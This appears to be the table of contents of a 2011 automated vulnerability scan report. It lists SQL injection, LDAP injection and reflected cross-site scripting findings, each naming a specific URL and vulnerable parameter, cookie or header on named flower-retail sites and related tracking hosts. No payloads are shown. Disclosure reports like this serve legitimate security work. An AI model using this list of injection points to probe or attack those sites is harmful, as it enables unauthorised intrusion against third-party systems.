XSS, Open Redirection, Insecure Configuration, CWE-79, CAPEC-86, DORK, GHDB, 05092011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 07:41:14 CDT 2011.



1. SQL injection

1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]

1.12. http://www.ftd.com/351 [REST URL parameter 1]

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]

2. LDAP injection

2.1. http://blooms.1800flowers.com/cm [ci parameter]

2.2. http://www.ftd.com/ [TLTSID cookie]

3. XPath injection

4. Cross-site scripting (reflected)

4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]

4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]

4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

